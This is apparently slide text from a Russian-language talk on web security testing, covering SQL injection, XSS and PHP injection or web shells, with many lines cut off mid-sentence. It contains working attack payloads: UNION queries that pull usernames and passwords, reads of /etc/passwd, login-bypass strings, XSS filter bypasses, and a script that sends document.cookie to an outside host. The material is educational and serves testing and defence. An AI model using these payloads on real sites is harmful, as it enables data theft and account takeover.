Тестирование защищенности. Все проще чем кажется. Игорь Бондаренко. Intetics Co.

Зачем нужно тестировать защищенность

90% сайтов опасны для пользователей и представляют угрозу

SQL Injection

Внедрение SQL-кода — один из распространённых способов взлома сайтов и

Что может получить злоумышленник

Архитектура уязвимости типа SQL Injection

Простейший способ обнаружить уязвимость

Добавляем одинарную кавычку к запросу:
http://www.site.com/?id=1‘
Получаем ошибку типа:
Warning: mysql_fetch_object():

Почему так происходит?

query =
"SELECT * FROM news WHERE id = '"

Какие еще есть способы проверки?

Использование простых арифметических операций в запросе:
site.com/index.php?id=2-1(Выводит страницу

Как этим пользоваться?

/?id=1' UNION SELECT user,password FROM users--
SELECT title,text FROM news

Blind SQL injection
Тестирование истинных и ложных запросов:
site.com/index.php?id=2’ AND ‘1’ = ‘1’--
site.com/index.php?id=2’

Double-blind injection
Посимвольный перебор с помощью Benchmark:
site.com/index.php?id=2’ OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1,

На что еще обращать внимание?

URL:
http://www.google.com/search?q=inurl:select+inurl:%2520+inurl:from+inurl:where

Практика, или SQL Injection глазами злоумышленника

Определение типа базы данных
Проверка прав пользователя

Ошибки характерные для разных видов баз данных

Подбор количества столбцов

1. Простой перебор допустим у нас есть сайт с инъекцией:

2. Оператор ORDER BY
www.site.com/index.php?id=-1+order+by+1--
ошибки нет, значит столбцов 1 или больше

Определение вывода

Предположим мы подобрали количество столбцов и их оказалось 4
www.site.com/index.php?id=-1+union+select+null,null,null,null
Теперь нас

Получаем информацию о версии и пользователе

Для получения информации о текущем пользователе

Чтение и запись файлов

Проверка возможности чтения/записи файлов:
www.site.com/index.php?id=-1+union+select+null,file_priv,null,null+union+select+file_priv+from+mysql.user+where+user= ‘%USERNAME%'--
Чтение файла
www.site.com/index.php?id=-1+union+select+null,file_priv,null,null+union+select+ union+select+LOAD_FILE('/etc/passwd')+from+mysql.user--

Узнаем таблицы

Для получения информации о таблицах и колонках необходимо обратиться к

Получаем информацию о колонках

Перебрав таблицы, определяем ту которая нам будет интересна.

Фильтрация кавычек

Чаще всего, проделав действия описанные на предыдущем слайде, вы увидите

Фильтрация кавычек

Второй способ: использование вложенного подзапроса
www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF  ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1+offset+1)--

Фильтация пробелов

В случае фильтрации пробелов существуют следующий способы обхода фильтра:
Использование пробельных

Получение информации из таблицы

Составляем запрос:
www.site.com/index.php?id=-1+union+select+null,username,null,null+from+user--
Он возвратит нам в данном случае имя

Уязвимость в скрипте авторизации

Поле ввода имени пользователя:
Username’--
Поле ввода пароля:
123' OR login='Admin'

Демонстрация примеров

Программы для работы с инъекциями

SQL InjectMe – плагин для Firefox
Absinthe –

XSS
XSS (Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных

XSS

XSS

Цель
Выполнить «чужеродный» JavaScript-код в браузере клиента, когда он находится на атакуемом

Классификация XSS

Активный XSS
Внедренный скрипт сохраняется в системе и становится доступен для

Чем мы рискуем?

Кража Cookies
var іmg = new Image(); іmg.srс = 'http://site/xss.php?' +

Метод обнаружения

/?id="> HTML - код страницы примет вид .. "... В

Типичный случай
Самая распространенная разновидность XSS: ">
Вся суть в ">
После

Фильтры: определяем наличие и качество

В любое поле вводим проверочную строку: '';!--"=&{()} Далее

Практика

Допустим фильтр экранирует <>
В этом случае существует вероятность обхода фильтра.
К

Автозакрывающиеся скобки:
>>>>< javascript:alert ('

Как воспользоваться этим скриптом?

http://site.ru/free?p='>
http://site.ru/free?p='>
При этом файл js.js содержит: img=new Image();img.src="http://test.com/s/Hack.gif?"+document.cookie; этот

Изменение кодировки
http://ha.ckers.org/xss.html
Изначально скрипт выглядел так:
http://cite.com/test?p='>
После:
%68%74%74%70%3A%2F%2F%63%69%74%65%2E%63%6F%6D%2F%74%65%73%74%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%6E%65%74%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E%0A

DDoS-атака

XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть

Демонстрация примеров

Инструменты для обнаружения XSS

XSSme – аддон для Firfox
DOMinator – анализатор наличия

PHP Injection

PHP Injection или создание веб шеллов – это второй по

Уязвимые функции

Eval()
Include()
Require()
Create_function()
Preg_replace()

Виды инклудов

Include ("$page.php");
… ?>
Возможен Remote File Inclusion (RFI)

Метод определения уязвимости

index.php?page=shop
Подставим dsdsds вместо shop:
Warning: main(dsdsds.php): failed to open stream:

Веб шелл

Это происходит потому, что код страницы имеет такой элемент
..

Выход за пределы текущего каталога

Apache Tomcat 5 версии ниже 5.5.22 и Apache

Инструменты для обнаружения

Graudit - семантически-статический анализатор кода
RIPS – утилита для поискам уязвимостей

Демонстрация примеров